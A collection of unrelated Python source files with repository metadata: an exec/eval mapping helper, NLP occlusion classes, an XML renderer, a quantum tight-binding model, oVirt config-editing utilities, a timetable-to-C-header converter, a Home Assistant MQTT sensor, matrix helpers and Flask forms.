code = compile(ast_node, parse_filename, _type)
if hasattr(resolve, '__getitem__'):
if assign is not None:
raise TypeError('"assign" parameter specified where "resolve" is a mapping')
if delete is not None:
raise TypeError('"delete" parameter specified where "resolve" is a mapping')
input_mapping = resolve
def resolve(x):
try:
return input_mapping[x]
except KeyError:
raise NameError(x)
assign = input_mapping.__setitem__
delete = input_mapping.__delitem__
else:
input_mapping = False
class DynamicMapping(object):
_data = {}
_deleted = set()
def __repr__(self):
if input_mapping:
return 'DynamicMapping({!r})'.format(input_mapping)
else:
return 'DynamicMapping(resolve={!r}, assign={!r})'.format(resolve, assign)
def __getitem__(self, key):
if key in self._deleted:
raise NameError(key)
if assign is None:
try:
return self._data[key]
except KeyError:
pass # Continue with resolve()
try:
return resolve(key)
except NameError as exc:
if automatic_builtins and not key.startswith('_'):
try:
return getattr(builtins, key)
except AttributeError:
pass
raise exc
def __setitem__(self, key, value):
self._deleted.discard(key)
if assign is None:
self._data[key] = value
else:
assign(key, value)
def __delitem__(self, key):
if delete is None:
self._deleted.add(key)
else:
delete(key)
def get(self, key, default=None):
try:
return self[key]
except NameError:
return default
mapping = DynamicMapping()
globals_ = {'__dict__': mapping}
if filename:
mapping['__file__'] = filename
globals_['__file__'] = filename
if module_name:
mapping['__name__'] = module_name
globals_['__name__'] = module_name
return (exec_ if _type == 'exec' else eval)(code, globals_)
def dynamic_eval(*args, **kwargs):
return dynamic_exec(*args, _type='eval', **kwargs)
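if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): global reads and
    # writes inside the executed snippet are routed through the mapping.
    store = {'x': 1}
    dynamic_exec('y = x + 1', store)
    print(store['y'])  # prints 2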
| 2.390625 | 2 |
olm/instances.py | DFKI-NLP/OLM | 8 | 12759592 | <reponame>DFKI-NLP/OLM
from typing import Dict, Tuple, List, Optional
class TokenField:
def __init__(self, tokens: List[str]) -> None:
self._tokens = tokens
@property
def tokens(self) -> List[str]:
return self._tokens
def __repr__(self) -> str:
return f"TokenField({self.tokens})"
class OccludedTokenField(TokenField):
def __init__(self,
tokens: List[str],
occluded_index: int,
occlude_token: str) -> None:
super().__init__(tokens)
self._occluded_index = occluded_index
self._occlude_token = occlude_token
@property
def tokens(self) -> List[str]:
tmp_tokens = list(self._tokens)
tmp_tokens[self._occluded_index] = self._occlude_token
return tmp_tokens
@property
def occluded_index(self) -> int:
return self._occluded_index
def __repr__(self) -> str:
return f"OccludedTokenField({self.tokens})"
@classmethod
def from_token_field(cls,
token_field: TokenField,
occluded_index: int,
occlude_token: str) -> "OccludedTokenField":
return cls(token_field.tokens, occluded_index, occlude_token)
class DeletedTokenField(OccludedTokenField):
def __init__(self,
tokens: List[str],
occluded_index: int) -> None:
super().__init__(tokens, occluded_index, occlude_token="")
self._occluded_index = occluded_index
@property
def tokens(self) -> List[str]:
tmp_tokens = list(self._tokens)
del tmp_tokens[self._occluded_index]
return tmp_tokens
def __repr__(self) -> str:
return f"DeletedTokenField({self.tokens})"
@classmethod
def from_token_field(cls,
token_field: TokenField,
occluded_index: int) -> "DeletedTokenField":
return cls(token_field.tokens, occluded_index)
class InputInstance:
def __init__(self,
id_: str,
**token_fields: Dict[str, List[str]]) -> None:
self.id = id_
self.token_fields = {name: TokenField(tokens)
for name, tokens in token_fields.items()}
for key, value in self.token_fields.items():
setattr(self, key, value)
def __repr__(self) -> str:
return f"InputInstance(id={self.id}, token_fields={self.token_fields})"
class OccludedInstance:
def __init__(self,
id_: str,
token_fields: Dict[str, TokenField],
weight: float = 1.) -> None:
self.id = id_
self.weight = weight
self.token_fields = token_fields
for key, value in token_fields.items():
setattr(self, key, value)
@property
def occluded_indices(self) -> Optional[Tuple[str, int]]:
indices = []
for name, field in self.token_fields.items():
if isinstance(field, OccludedTokenField):
indices.append((name, field.occluded_index))
# for now, only allow up to one occluded token per instance
assert len(indices) <= 1
return indices[0] if indices else None
def __repr__(self) -> str:
return f"OccludedInstance(id={self.id}, token_fields={self.token_fields}), weight={self.weight})"
@classmethod
def from_input_instance(cls,
input_instance: InputInstance,
occlude_token: Optional[str] = None,
occlude_field_index: Optional[Tuple[str, int]] = None,
weight: float = 1.) -> "OccludedInstance":
if occlude_token is not None and occlude_field_index is None:
raise ValueError("'occlude_token' requires setting 'occlude_field_index'.")
token_fields = input_instance.token_fields
if occlude_field_index is not None:
token_fields = dict(token_fields)
field_name, field_index = occlude_field_index
token_field = token_fields[field_name]
if occlude_token is None:
occluded_token_field = DeletedTokenField.from_token_field(token_field,
occluded_index=field_index)
else:
occluded_token_field = OccludedTokenField.from_token_field(token_field,
occluded_index=field_index,
occlude_token=occlude_token)
token_fields[field_name] = occluded_token_field
return cls(id_=input_instance.id,
token_fields=token_fields,
weight=weight)
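if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): occludes the
    # second token of a single-field instance; '[MASK]' is an assumed token.
    inst = InputInstance('ex-1', text=['the', 'cat', 'sat'])
    occluded = OccludedInstance.from_input_instance(
        inst, occlude_token='[MASK]', occlude_field_index=('text', 1))
    print(occluded.text.tokens)  # ['the', '[MASK]', 'sat']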
| 2.40625 | 2 |
tomes_darcmail/lib/eaxs_helpers/Render.py | StateArchivesOfNorthCarolina/docker_dmc | 0 | 12759593 | <reponame>StateArchivesOfNorthCarolina/docker_dmc<filename>tomes_darcmail/lib/eaxs_helpers/Render.py
#############################################################
# 2016-09-22: Render.py
# Author: <NAME> (State Archives of North Carolina)
#
# Description: Renders a single Element and its children
##############################################################
from xml.etree.ElementTree import Element
from xml.etree.ElementTree import SubElement
from xml.etree.ElementTree import tostring
from xml.dom import minidom
import xml.parsers.expat
class Render:
""""""
def __init__(self, root, children=None):
"""Constructor for Render
@type root: str
@type children: dict
"""
self.root = Element(root) # type: Element
self.children = children
self._build_element()
def _build_element(self):
if self.children:
for e_type, value in self.children.items():
child = SubElement(self.root, e_type)
child.text = value
def render(self):
rough = tostring(self.root, 'utf-8')
try:
reparsed = minidom.parseString(rough)
text = reparsed.toprettyxml(indent=" ")
return text
except xml.parsers.expat.ExpatError as e:
# This is a potential problem where the binary is not actually base64 encoded
# TODO: Write corrupted bytes to a file.
self.children['Content'] = "ERROR: original attachment is corrupted"
self.root = Element('ExternalBodyPart')
self._build_element()
return self.render()
def add_child(self, name, value):
child = SubElement(self.root, name)
child.text = value
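if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): the element and
    # child names below are illustrative, not EAXS schema requirements.
    r = Render('BodyContent', {'TransferEncoding': 'base64', 'Content': 'aGVsbG8='})
    print(r.render())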
| 2.078125 | 2 |
smart-lamp/modes/terminal.py | semspanhaak/making-things-smart | 1 | 12759594 | #!/usr/bin/python
import sys
from sense_hat import SenseHat
import variables.colors as c
import variables.mode as m
from libs.set_color import *
def set_color_terminal():
sense = SenseHat()
try:
color = input("Type an rgb color: ")
except (KeyboardInterrupt, SystemExit):
sys.exit()
    except Exception:
print("Changed mode...")
try:
if color == "close" or color == "next":
m.mode_index += 1
else:
c.color = color
set_color()
except (KeyboardInterrupt, SystemExit):
sys.exit()
    except Exception:
print("Not a valid input, use it as following: <number>,<number>,<number> -> 255,255,255")
| 3.03125 | 3 |
abintb/qn.py | abyellow/abin-tight-binding | 1 | 12759595 | <reponame>abyellow/abin-tight-binding<gh_stars>1-10
import numpy as np
from scipy.linalg import expm
import matplotlib.pyplot as plt
from time import time
class QnModel:
"""
Initial data/conditions of Quantum Hamiltonian and initial states.
"""
def __init__(self, QnIni, tb_model=False):
self.QnIni = QnIni
self.k = QnIni.k
self.ctrlt = QnIni.ctrlt #np.array(ctrlt) #initial control/laser
self.H0 = QnIni.H0 #Hamiltonian with no control/laser
self.Hctrl = QnIni.ham_t()#np.array(Hctrlt) #Hamiltonian of control/laser term
self.phi_i = QnIni.phi_i() #initial quantum states
self.dt = QnIni.dt #time step size
self.tb_model = tb_model
self.dim = np.shape(self.H0)[0] #dimension of Hamiltonian
self.t_ini = 0. #start time
self.tim_all = np.shape(self.Hctrl)[0] #time length of ctrl/laser
self.real_tim = np.array(range(self.tim_all+1)) * self.dt +\
self.t_ini #real time of time length
self.pau_i = np.array([[1,0],[0,1]])
def u_dt(self, H, tim):
"""propagator of dt time"""
if self.tb_model:
#cond = QnIni(k=self.k,ctrlt=self.ctrlt)
dx,dy,dz = self.QnIni.dvec(self.ctrlt[tim])
d = np.sqrt(dx**2 + dy**2 + dz**2)*self.dt
u = np.cos(d)*self.pau_i -1j*self.dt/d*np.sin(d)*H
else:
u = expm(-1j*H*self.dt)
return u
def u_t(self):
"""Evolve propergator for given time period"""
dim = self.dim
tim_all = self.tim_all
#ctrl = self.ctrl
H0 = self.H0
Hctrl = self.Hctrl
u_all = np.zeros((tim_all+1,dim,dim),dtype = complex)
u_all[0,:,:] = np.eye(dim)
        for tim in range(tim_all):
H = H0 + Hctrl[tim]#np.matrix( ctrl[i,tim] * np.array(Hctrl[i]))
u_all[tim+1,:,:] = np.dot(self.u_dt(H,tim), u_all[tim,:,:])
return u_all
def phi_t(self):
"""Evolve state for given time period"""
dim = self.dim
tim_all = self.tim_all
phi_all = np.zeros((tim_all+1,dim,1),dtype = complex)
phi_all[0,:,:] = self.phi_i[:]
u_all = self.u_t()
        for tim in range(tim_all):
phi_all[tim+1,:,:] = np.dot(u_all[tim+1,:,:], phi_all[0,:,:])
return phi_all
def prob_t(self,phi):
"""probability in time"""
return np.real(phi*np.conjugate(phi))
class QnIni:
def __init__(self, k, ctrlt, dt = .1, tau=1.,deltau=.5, ham_val=0,state='mix'):
self.dt = dt
self.k = k
self.ctrlt = np.array(ctrlt)
self.ham_val = ham_val
self.tau = tau
self.deltau = deltau
self.state = state
self.H0 = np.zeros((2,2))
self.save_name = 'save_name'
def dvec(self,ctrl):
k = self.k
tau = self.tau
deltau = self.deltau #+ ctrlt
val = self.ham_val
if val == 0:
dx = tau+deltau + (tau-deltau) * np.cos(k-ctrl)
dy = (tau-deltau) * np.sin(k-ctrl)
dz = 0
elif val == 1:
deltau = -deltau
dx = tau+deltau + (tau-deltau) * np.cos(k-ctrl)
dy = (tau-deltau) * np.sin(k-ctrl)
dz = 0
elif val == 2:
dx = 0.#self.tau/2.
dy = 0.#(self.tau-deltau) * np.sin(k-A)
dz = tau * np.cos(k-ctrl)
elif val == 3:
dx = self.tau/2.
dy = 0.#(self.tau-deltau) * np.sin(k-A)
#dz = (tau+ctrlt) * np.cos(k)
dz = tau * np.cos(k-ctrl)
elif val == 4:
dx = tau+deltau + (tau-deltau) * np.cos(k[0]-ctrl)
dy = (tau-deltau) * np.sin(k[1]-ctrl)
dz = 0
return dx,dy,dz
def ham(self,ctrl):
pau_x = np.array([[0,1],[1,0]])
pau_y = np.array([[0,-1j],[1j,0]])
pau_z = np.array([[1,0],[0,-1]])
pau_i = np.array([[1,0],[0,1]])
dx,dy,dz = self.dvec(ctrl)
return pau_x * dx + pau_y * dy + pau_z * dz
def ham_t(self):
ctrlt = self.ctrlt
        return np.array([self.ham(c) for c in ctrlt])  # list comprehension keeps this working on Python 3
def phi_i(self):
state = self.state
w,v = np.linalg.eigh(self.ham(ctrl=0))
if state == 'mix':
return ((v[:,0]+v[:,1])/np.sqrt(2)).reshape(len(v[:,0]),1)
elif state == 'down':
return v[:,0].reshape(len(v[:,0]),1)
elif state == 'up':
return v[:,1].reshape(len(v[:,1]),1)
else:
            print('no such state!!')
def eig_energy(self,ctrl=0):
w, v = np.linalg.eigh(self.ham(ctrl))
return w
if __name__ == "__main__":
dt = .01
E0 = 1.
knum = 100
freq = 1.
tau = 1.
deltau = .5#-.3
#phi_ini = [[1],[0]]
n_tot = 4000
t_rel = (np.array(range(n_tot-1))-2000)*dt
ctrli = E0 * np.cos(freq*t_rel)
ki =[ 0.001 ,np.pi]
#ki = 0.001
ti = time()
cond1 = QnIni(k=ki, ctrlt=ctrli,ham_val = 4)
#phi_i = cond1.phi_i()
#Hctrl = cond1.ham_t()
#print Hctrl.shape
#H0 = np.zeros((2,2))
model1 = QnModel(cond1)
phit = model1.phi_t()
probt = model1.prob_t(phit)
    print('run_time: ', time() - ti)
plt.plot(t_rel,probt[:-1,0,:])
plt.plot(t_rel,probt[:-1,1,:])
plt.show()
| 2.359375 | 2 |
packaging/setup/ovirt_engine_setup/util.py | redwebdew/ovirt-engine | 0 | 12759596 | #
# ovirt-engine-setup -- ovirt engine setup
#
# Copyright oVirt Authors
# SPDX-License-Identifier: Apache-2.0
#
#
"""Utils."""
import gettext
import grp
import pwd
import re
from otopi import constants as otopicons
from otopi import plugin
from otopi import util
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
def editConfigContent(
content,
params,
keep_existing=False,
changed_lines=None,
comment_re='[#]*\\s*',
param_re='\\w+',
new_comment_tpl='{spaces}# {original}',
separator_re='\\s*=\\s*',
new_line_tpl='{spaces}{param} = {value}',
added_params=None,
):
"""Return edited content of a config file.
Keyword arguments:
content - a list of strings, the content prior to calling us
params - a dict of params/values that should be in the output
If the value for a param is None, param is deleted
keep_existing - if True, existing params are not changed, only missing
ones are added.
changed_lines - an output parameter, a list of dictionaries with
added and removed lines.
comment_re - a regular expression that a comment marker prefixed
to param should match. If a commented param line is found,
a new line will be added after it.
param_re - a regular expression that should match params
new_comment_tpl - a template for a comment. {original} will be replaced
with this template, {spaces} will be replaced with
original whitespace prefix.
separator_re - a regular expression that the separator between
param and value should match
new_line_tpl - a template for a new line. {param} will be replaced
with param, {value} with value.
added_params - an output parameter, a list of params that were added
in the end because they were not found in content.
Params that appear uncommented in the input, are commented, and new
values are added after the commented lines. Params that appear only
commented in the input, the comments are copied as-is, and new lines
are added after the comments. Params that do not appear in the input
are added in the end.
"""
params = params.copy()
pattern = r"""
^
(?P<spaces>\s*)
(?P<comment>{comment_re})
(?P<original>
(?P<param>{param_re})
(?P<separator>{separator_re})
(?P<value>.*)
)
$
""".format(
comment_re=comment_re,
param_re=param_re,
separator_re=separator_re,
)
re_obj = re.compile(flags=re.VERBOSE, pattern=pattern)
# Find params which are uncommented in the input.
uncommented = set()
for line in content:
f = re_obj.match(line)
if (
f is not None and
f.group('param') in params and
not f.group('comment')
):
uncommented.add(f.group('param'))
if changed_lines is None:
changed_lines = []
if added_params is None:
added_params = []
newcontent = []
processed = set()
for line in content:
f = re_obj.match(line)
if (
f is not None and
f.group('param') in params and
not (
f.group('param') in uncommented and
f.group('comment')
)
# If param in uncommented and current line is comment,
# we do not need to process it - we process the uncommented
# line when we see it
):
if (
not f.group('comment') and
(
str(f.group('value')) == str(params[f.group('param')]) or
keep_existing
)
):
# value is not changed, or we do not care. do nothing
processed.add(f.group('param'))
else:
if (
f.group('param') in uncommented and
not f.group('comment')
):
# Add current line, commented, before new line
currentline = new_comment_tpl.format(
spaces=f.group('spaces'),
original=f.group('original'),
)
changed_lines.append(
{
'added': currentline,
'removed': line,
}
)
newcontent.append(currentline)
else:
# Only possible option here is that current line is
# a comment and param is not in uncommented. Keep it.
# Other two options are in "if"s above.
# The last option - param is not in uncommented
# and current line is not a comment - is not possible.
newcontent.append(line)
newline = new_line_tpl.format(
spaces=f.group('spaces'),
param=f.group('param'),
value=params[f.group('param')],
)
changed_lines.append(
{
'added': newline,
}
)
processed.add(f.group('param'))
line = newline
newcontent.append(line)
# Add remaining params at the end
for param, value in params.items():
if param not in processed:
newline = new_line_tpl.format(
spaces='',
param=param,
value=value,
)
newcontent.append(newline)
changed_lines.append(
{
'added': newline,
}
)
added_params.append(param)
return newcontent
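# Hedged usage sketch (illustrative only, not part of the original module):
#
#     >>> editConfigContent(['# foo = 1'], {'foo': '2'})
#     ['# foo = 1', 'foo = 2']
#
# The commented line is kept as-is and an uncommented assignment is added
# right after it; params that never appear in the content are appended at
# the end of the returned list.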
@util.export
def getUid(user):
return pwd.getpwnam(user)[2]
@util.export
def getGid(group):
return grp.getgrnam(group)[2]
@util.export
def parsePort(port):
try:
port = int(port)
except ValueError:
raise ValueError(
_('Invalid port {number}').format(
number=port,
)
)
if port < 0 or port > 0xffff:
raise ValueError(
_('Invalid number {number}').format(
number=port,
)
)
return port
@util.export
def getPortTester():
def test_port(port):
res = ''
try:
parsePort(port)
except ValueError as e:
res = e
return res
return test_port
@util.export
def addExitCode(environment, code, priority=plugin.Stages.PRIORITY_DEFAULT):
environment[
otopicons.BaseEnv.EXIT_CODE
].append(
{
'code': code,
'priority': priority,
}
)
@util.export
def getPackageManager(logger=None):
"""Return a tuple with the package manager printable name string, the mini
implementation class and the sink base class, for the preferred package
manager available in the system.
    The only parameter accepted by this function is a logger instance, which
    can be omitted (or None) if the user doesn't want logs.
"""
try:
from otopi import minidnf
minidnf.MiniDNF()
if logger is not None:
logger.debug('Using DNF as package manager')
return 'DNF', minidnf.MiniDNF, minidnf.MiniDNFSinkBase
except (ImportError, RuntimeError):
try:
from otopi import miniyum
            # yum does not raise validation exceptions in its constructor,
            # so it's not worth instantiating it to test.
if logger is not None:
logger.debug('Using Yum as package manager')
return 'Yum', miniyum.MiniYum, miniyum.MiniYumSinkBase
except ImportError:
raise RuntimeError(
_(
'No supported package manager found in your system'
)
)
# vim: expandtab tabstop=4 shiftwidth=4
| 2.484375 | 2 |
TimeTable2Header/timetable2header.py | SCOTT-HAMILTON/TimeTable2Header | 2 | 12759597 | <reponame>SCOTT-HAMILTON/TimeTable2Header
import pandas as pd
import numpy as np
import math
def convert_excel_timetable2_c_header(
input_excel_timetable):
name,weeks = extract_excel_data(input_excel_timetable)
return data_to_header(name, weeks)
def extract_excel_data(input_excel_timetable):
data = pd.read_excel(input_excel_timetable, engine="openpyxl")
name = data.columns[0]
data.fillna('', inplace=True)
numberOfWeeksFilled = int(len(list(filter(lambda x: x != '', data.values[0]))))
weeks = []
for week in range(numberOfWeeksFilled):
compressColumnCondition = np.full(numberOfWeeksFilled*2, False)
compressColumnCondition[week*2] = True
a1 = np.compress(compressColumnCondition, data.values, axis=1)
compressColumnCondition[week*2] = False
compressColumnCondition[week*2+1] = True
a2 = np.compress(compressColumnCondition, data.values, axis=1)
weekName = a1[0][0]
a1 = np.delete(a1,0,0)
a2 = np.delete(a2,0,0)
first = True
gaps = []
for hour in zip(a1,a2):
hour = np.array(hour)
hour = hour.flatten()
if first:
startTime = hour[0]
first = False
continue
elif hour[0] == '':
break
elif hour[1] == '':
endTime = hour[0]
else:
gaps.append((hour[0],hour[1]))
weeks.append((weekName, startTime, endTime, gaps))
return (name, weeks)
def data_to_header(name, weeks):
nameUppercase = name.upper()
text = """#ifndef APPS_AGENDA_"""+nameUppercase+"""_DEF_H
#define APPS_AGENDA_"""+nameUppercase+"""_DEF_H
#include "agenda_types.h"
const AgendaDef agenda_"""+name.lower()+""" =
{
.name = \""""+name+"""",
.days = {
"""+",\n".join([week_to_header(w) for w in weeks])+"""
}
};
#endif //APPS_AGENDA_"""+nameUppercase+"""_DEF_H"""
return text
def str_to_header_time(str):
tab = str.split('h')
return "{"+tab[0]+","+tab[1]+"}"
def week_to_header(week):
text = """ // """+week[0]+"""
{
"""+str_to_header_time(week[1])+""", // Start Time
"""+str(len(week[3]))+""", // gapsCount
{
"""+",\n".join([gap_to_header(g) for g in week[3]])+"""
},
"""+str_to_header_time(week[2])+""" // End Time
}"""
return text
def gap_to_header(gap):
text = """ {"""+str_to_header_time(gap[0])+""",
"""+str_to_header_time(gap[1])+"""}"""
return text
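if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): the workbook
    # name below is an assumption.
    print(convert_excel_timetable2_c_header('timetable.xlsx'))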
| 3.25 | 3 |
seata/core/model/BranchStatus.py | opentrx/seata-python | 8 | 12759598 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# @author jsbxyyx
# @since 1.0
from enum import Enum
class BranchStatus(Enum):
"""
The Unknown.
description: Unknown branch status.
"""
    Unknown = 0
"""
The Registered.
description: Registered to TC.
"""
    Registered = 1
"""
The Phase one done.
description: Branch logic is successfully done at phase one.
"""
    PhaseOne_Done = 2
"""
The Phase one failed.
description: Branch logic is failed at phase one.
"""
    PhaseOne_Failed = 3
"""
The Phase one timeout.
description: Branch logic is NOT reported for a timeout.
"""
    PhaseOne_Timeout = 4
"""
The Phase two committed.
description: Commit logic is successfully done at phase two.
"""
    PhaseTwo_Committed = 5
"""
The Phase two commit failed retryable.
description: Commit logic is failed but retryable.
"""
    PhaseTwo_CommitFailed_Retryable = 6
"""
The Phase two commit failed unretryable.
description: Commit logic is failed and NOT retryable.
"""
    PhaseTwo_CommitFailed_Unretryable = 7
"""
The Phase two rollbacked.
description: Rollback logic is successfully done at phase two.
"""
    PhaseTwo_Rollbacked = 8
"""
The Phase two rollback failed retryable.
description: Rollback logic is failed but retryable.
"""
    PhaseTwo_RollbackFailed_Retryable = 9
"""
The Phase two rollback failed unretryable.
description: Rollback logic is failed but NOT retryable.
"""
PhaseTwo_RollbackFailed_Unretryable = 10 | 2.5 | 2 |
led/dump/led-demo-yun/cohorte/dist/cohorte-1.0.0-20141216.234517-57-python-distribution/repo/cohorte/composer/node/history.py | isandlaTech/cohorte-demos | 1 | 12759599 | <filename>led/dump/led-demo-yun/cohorte/dist/cohorte-1.0.0-20141216.234517-57-python-distribution/repo/cohorte/composer/node/history.py
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Node Composer: Node status history
:author: <NAME>
:license: Apache Software License 2.0
:version: 3.0.0
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Module version
__version_info__ = (3, 0, 0)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
# Composer
import cohorte.composer
# iPOPO Decorators
from pelix.ipopo.decorators import ComponentFactory, Provides, Instantiate, \
Invalidate
# Standard library
from pprint import pformat
import logging
import threading
import time
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
@ComponentFactory()
@Provides(cohorte.composer.SERVICE_HISTORY_NODE)
@Instantiate('cohorte-composer-node-history')
class NodeHistory(object):
"""
Associates components to their hosting isolate
"""
def __init__(self):
"""
Sets up members
"""
# Storage: time stamp -> distribution
self._storage = {}
self._lock = threading.Lock()
@Invalidate
def invalidate(self, context):
"""
Component invalidated
"""
self.clear()
def clear(self):
"""
Clears the storage
"""
with self._lock:
self._storage.clear()
def keep_recent(self, timestamp):
"""
Keeps history after the given time stamp, removes other entries
:param timestamp: Minimal timestamp to be kept
"""
with self._lock:
# Sort times
stamps = sorted(self._storage.keys())
for stamp in stamps:
if stamp < timestamp:
del self._storage[stamp]
def items(self):
"""
Returns a sorted list of (time stamp, {isolate -> [names]}) tuples
"""
with self._lock:
return sorted(self._storage.items())
def store(self, distribution):
"""
Stores the given isolate distribution
:param distribution: A isolate -> components names dictionary
"""
# Store the stamp ASAP
timestamp = time.time()
with self._lock:
# Store our distribution
self._storage[timestamp] = dict((isolate, tuple(components))
for isolate, components
in distribution.items())
_logger.info("Node composer stored in history:\n%s",
pformat(self._storage[timestamp]))
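if __name__ == '__main__':
    # Hedged usage sketch (not part of the original component): exercises the
    # storage directly, outside the iPOPO container that normally manages it.
    history = NodeHistory()
    history.store({'isolate-1': ['component.a', 'component.b']})
    for stamp, distribution in history.items():
        print("%s -> %s" % (stamp, distribution))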
| 1.617188 | 2 |
homeassistant/components/ais_supla_mqtt/sensor.py | sckevmit/AIS-home-assistant | 5 | 12759600 | """Support for SUPLA MQTT sensors."""
from datetime import timedelta
import logging
import homeassistant.components.mqtt as hass_mqtt
from homeassistant.core import callback
from homeassistant.helpers.entity import Entity
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(minutes=2)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Perform the setup for SUPLA MQTT status sensor."""
_LOGGER.debug("SUPLA MQTT sensor, async_setup_entry")
config_mqtt_settings = hass.data[DOMAIN][config_entry.entry_id]
mqtt_settings = config_mqtt_settings.data
async_add_entities([SuplaMqttSoftBridge(hass, mqtt_settings)], True)
class SuplaMqttSoftBridge(Entity):
"""Supla Mqtt Soft Bridge representation."""
def __init__(self, hass, mqtt_settings):
"""Sensor initialization."""
self._username = mqtt_settings["username"]
self._qos = 0
self._manufacturer = "SUPLA.ORG"
self._model = "MQTT Bridge"
self._os_version = "v3"
self._supla_in = 0
self._supla_out = 0
self._sub_state = None
@callback
async def hass_message_out(self, msg):
"""Handle new MQTT messages."""
self._supla_out = self._supla_out + 1
@callback
async def supla_message_in(self, msg):
"""Handle new MQTT messages."""
self._supla_in = self._supla_in + 1
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
await self._subscribe_topics()
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
self._sub_state = await hass_mqtt.subscription.async_subscribe_topics(
self.hass,
self._sub_state,
{
"execute": {
"topic": "supla/+/devices/+/channels/+/execute_action",
"msg_callback": self.hass_message_out,
"qos": self._qos,
},
"set": {
"topic": "supla/+/devices/+/channels/+/set/+",
"msg_callback": self.hass_message_out,
"qos": self._qos,
},
"set": {
"topic": "supla/#",
"msg_callback": self.supla_message_in,
"qos": self._qos,
},
"set": {
"topic": "homeassistant/#",
"msg_callback": self.supla_message_in,
"qos": self._qos,
},
},
)
async def async_will_remove_from_hass(self):
"""Unsubscribe when removed."""
self._sub_state = await hass_mqtt.subscription.async_unsubscribe_topics(
self.hass, self._sub_state
)
@property
def device_info(self):
"""Device info."""
return {
"identifiers": {(DOMAIN, self._username)},
"name": f"MQTT Bridge",
"manufacturer": self._manufacturer,
"model": self._model,
"sw_version": self._os_version,
"via_device": None,
}
@property
def unique_id(self) -> str:
"""Return a unique, friendly identifier for this entity."""
return self._username
@property
def name(self):
"""Return the name of the sensor."""
return f"SUPLA connection status"
@property
def state(self):
"""Return the status of the sensor."""
# connection result codes
return "mqtt bridge connection"
@property
def unit_of_measurement(self) -> str:
"""Return the unit of measurement of this entity."""
return ""
@property
def device_state_attributes(self):
"""Return the attributes of the device."""
return {
"MQTT packets OUT": self._supla_out,
"MQTT packets IN": self._supla_in,
}
@property
def icon(self):
"""Return the icon to use in the frontend."""
return "mdi:bridge"
async def async_update(self):
"""Sensor update."""
pass
| 2.28125 | 2 |
utils.py | gim4855744/GCCF | 0 | 12759601 | import scipy.sparse as sp
import pandas as pd
import numpy as np
import torch
import h5py
def get_adj(num_rows, num_cols, row_idx, col_idx, device):
adj = torch.zeros((num_rows, num_cols), dtype=torch.float32, device=device)
adj[row_idx, col_idx] = 1.
adj = adj / adj.sum(dim=1, keepdim=True)
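    # rows with no observed entries divide by zero above; reset those NaNs to 0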
adj.masked_fill_(torch.isnan(adj), 0)
return adj
def load_matlab_file(path_file, name_field):
db = h5py.File(path_file, 'r')
ds = db[name_field]
try:
if 'ir' in ds.keys():
data = np.asarray(ds['data'])
ir = np.asarray(ds['ir'])
jc = np.asarray(ds['jc'])
out = sp.csc_matrix((data, ir, jc))
except AttributeError:
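        # ds is a dense h5py Dataset (no .keys()), so read it directly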
out = np.asarray(ds).T
db.close()
    return out.astype(int)  # np.int (alias of the builtin int) was removed in NumPy 1.24
def matrix2data(matrix, rating):
idx = np.argwhere(matrix > 0)
rows = idx[:, 0]
columns = idx[:, 1]
ratings = rating[rows, columns].reshape(-1, 1)
data = np.concatenate([idx, ratings], axis=1)
data = pd.DataFrame(data, columns=('user', 'movie', 'rating'))
return data
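if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): builds a
    # row-normalized 2x3 adjacency matrix from three observed entries.
    rows = torch.tensor([0, 0, 1])
    cols = torch.tensor([0, 2, 1])
    print(get_adj(2, 3, rows, cols, torch.device('cpu')))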
| 2.09375 | 2 |
app/main/forms.py | lihuii/fanxiangce | 79 | 12759602 | <gh_stars>10-100
# -*-coding: utf-8-*-
from flask_wtf import Form
from wtforms import StringField, SubmitField, RadioField, PasswordField, BooleanField, FileField, \
TextAreaField, SelectField, IntegerField, SelectMultipleField
from wtforms.validators import DataRequired, Length, Email, Regexp, EqualTo, URL, Optional, NumberRange
from wtforms import ValidationError
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms.widgets import TextArea
from .. import photos
from ..models import User, Role
class SettingForm(Form):
    name = StringField(u'Name or nickname', validators=[Length(0, 64)])
    status = StringField(u'Signature', validators=[Length(0, 64)])
    location = StringField(u'City', validators=[Length(0, 64)])
    website = StringField(u'Website', validators=[Length(0, 64), Optional(),
                                         ], render_kw={"placeholder": "http://..."})
    about_me = TextAreaField(u'About me', render_kw={'rows': 8})
    like_public = BooleanField(u'Make my likes public')
    submit = SubmitField(u'Submit')
def validate_website(self, field):
if field.data[:4] != "http":
field.data = "http://" + field.data
class EditProfileAdminForm(Form):
    email = StringField(u'Email', validators=[DataRequired(message= u'Email cannot be empty'), Length(1, 64),
                                              Email(message= u'Please enter a valid email address, e.g. <EMAIL>')])
    username = StringField(u'Username', validators=[DataRequired(message= u'Username cannot be empty'), Length(1, 64),
                                                    Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
                                                           u'Usernames may only consist of letters, '
                                                           u'numbers, dots and underscores.')])
    confirmed = BooleanField(u'Confirmation status')
    role = SelectField(u'Role', coerce=int)
    name = StringField(u'Name or nickname', validators=[Length(0, 64)])
    location = StringField(u'City', validators=[Length(0, 64)])
    website = StringField(u'Website', validators=[Length(0, 64),
                                                  URL(message= u'Please enter a valid URL, e.g. http://withlihui.com')])
    about_me = TextAreaField(u'About me')
    submit = SubmitField(u'Submit')
